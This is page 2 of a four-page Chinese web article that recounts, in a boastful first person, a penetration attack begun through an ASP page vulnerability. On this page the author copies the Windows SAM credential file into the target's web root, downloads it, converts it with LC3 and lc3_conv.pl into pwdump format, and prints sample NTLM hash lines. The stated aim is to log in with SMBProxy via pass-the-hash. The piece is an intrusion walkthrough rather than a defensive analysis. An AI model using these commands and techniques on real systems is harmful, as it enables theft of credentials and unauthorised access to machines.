您现在的位置: 无忧电子商务网 >> 信息学院 >> 程序开发 >> asp >> 正文

一次用ASP页面漏洞引发的渗透攻击

作者:佚名    信息学院来源:整理    点击数:    更新时间:2008-1-24 我要参与讨论

  嗯!行了!下载下来看!

呵呵!里面由用户列表、文章列表、还有系统统计——要的就是它!哈!果然找到了,01090208.asp的绝对路径就在里面,好,输入到浏览器里面看看……出来了!

[img]/UpLoadFiles/NewsPhoto/a5_885_1.jpg[/img]

好!copy SAM文件到网页根目录下载,在命令行里面输入:

copy d:\winnt\repair\sam e:\www.target.net\sam._

已成功复制1个文件,好了,在浏览器里面输入:

http://www.target.net/sam._

下载完毕……

下一步?LC4破解?不不!用新方法SMBProxy 登录!嘻嘻!新东西!

简介:

如果拿到一个远程主机NTLMHash密码信息, 一般都会使用暴力破解来获取密码,这个程序可以使用proxy方式与远程主机验证登陆,来达到快速进入的目的.

SMBProxy程序只认可pwdump格式的密码信息,LC格式不行,所以要将我得到的SAM文件转换为pwdump格式。

pwdump格式转换方法

先打开LC3,将SAM文件导入程序,随便选择一个模式进行破解,停止破解。

[img]/UpLoadFiles/NewsPhoto/5_885_19.jpg[/img]

将项目保存为LC3的文件格式——*.lcs。

使用SMBProxy自带的工具将LC格式的文件转换为pwdump格式。

E:\>perl lc3_conv.pl 2.lcs

Administrator:500:89B9639B628096295FBE6BDC86679876:C6EBC896A3C134D4CF18063C33ACC926:::

Guest:501:4316EDA750394C6B120438C30F7F1819:00000000000000000000000000000000:::

上一页  [1] [2] [3] [4] 下一页

在google里搜索更多一次用ASP页面漏洞引发的渗透攻击

Google
Web www.51ec.org
【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
我来说两句 对此文章发表了评论
  昵 称: *必填    ·注册用户·
  评 分: 1分 2分 3分 4分 5分     严禁发表危害国家安全、政治、黄色淫秽等内容的评论,用户需对自己在使用本网站服务过程中的行为承担法律责任。本站管理员有权保留或删除评论内容,评论内容只代表机友个人观点,与本网站立场无关。  
评 论
内 容

 
评论列表 (最新 评论仅限网友观点!)

供求信息




| 设为首页 | 加入收藏 | 关于我们 | 广告服务 | 联系方式 | 友情链接 | 版权申明